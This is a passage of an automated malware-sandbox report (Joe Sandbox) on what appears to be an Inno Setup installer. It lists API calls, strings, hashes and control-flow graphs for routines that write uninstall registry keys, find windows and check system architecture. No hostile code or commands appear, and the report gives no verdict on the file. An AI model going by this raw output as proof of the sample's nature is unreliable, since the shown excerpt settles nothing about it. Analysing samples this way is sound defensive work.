                                                                • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021FF3EC,022010F4,?,?,02201124,?,?,02201174,?), ref: 004683FD
                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                              • String ID: $(Default)$STOPIMAGE$%H
                                                              • API String ID: 3231140908-2624782221
                                                              • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                              • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                              • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                              • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                              Function 00474F88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                              • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID: unins$unins???.*
                                                              • API String ID: 3541575487-1009660736
                                                              • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                              • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                              • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                              • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                              Function 00452A60 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                              • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFindFirstLast
                                                              • String ID:
                                                              • API String ID: 873889042-0
                                                              • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                              • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                              • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                              • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                              Function 0046E0E4 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersion.KERNEL32(00000364,0046E17A), ref: 0046E0EE
                                                              • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,00000364,0046E17A), ref: 0046E10A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateInstanceVersion
                                                              • String ID:
                                                              • API String ID: 1462612201-0
                                                              • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                              • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                              • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                              • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                              Function 00408568 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                              • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                              • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                              • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                              Function 00423B84 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                              • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                              • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                              • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                              Function 0045559C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                              • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                              • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                              • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                              Function 0042F520 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                              • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                              • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                              • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5
                                                              Function 0046F058 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 927 46f326-46f331 call 478e04 919->927 920->927 934 46f333-46f338 927->934 935 46f33a 927->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1037 46f659-46f65d 1033->1037 1037->1020 1037->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                              APIs
                                                                • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                              • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Value$Close
                                                              • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                              • API String ID: 3391052094-3342197833
                                                              • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                              • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                              • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                              • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E
                                                              Function 00492848 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1088 4929bc-4929c9 call 403684 1079->1088 1089 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1089 1080->1060 1100 492a18-492a25 call 403684 1088->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1088->1101 1089->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1126 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1126 1127 492aa0-492aad call 403684 1113->1127 1114->1060 1126->1060 1139 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1127->1139 1140 492af4-492b01 call 403684 1127->1140 1139->1060 1152 492b48-492b55 call 403684 1140->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1140->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1182 492b87-492b95 GetLastError call 447278 1165->1182 1183 492b77-492b85 call 447278 1165->1183 1207 492c21-492c2c call 4470d0 1175->1207 1208 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1208 1188 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1188 1189 492c66-492c73 call 403684 1176->1189 1194 492b9a-492ba5 call 447278 1182->1194 1183->1194 1188->1060 1204 492c98-492ca5 call 403684 1189->1204 1205 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1189->1205 1194->1060 1215 492cdb-492ce8 call 403684 1204->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1204->1216 1205->1060 1207->1060 1208->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                              • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FindSleepWindow
                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                              • API String ID: 3078808852-3310373309
                                                              • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                              • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                              • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                              • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359
                                                              Function 00483A7C Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1631 483b4d-483b52 1626->1631 1629 483b23-483b27 1627->1629 1630 483b34-483b3b 1627->1630 1633 483b29-483b46 1629->1633 1634 483b3d-483b44 1629->1634 1630->1631 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1631 1634->1631 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                              • API String ID: 2230631259-2623177817
                                                              • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                              • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                              • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                              • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E
                                                              Function 00468D88 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
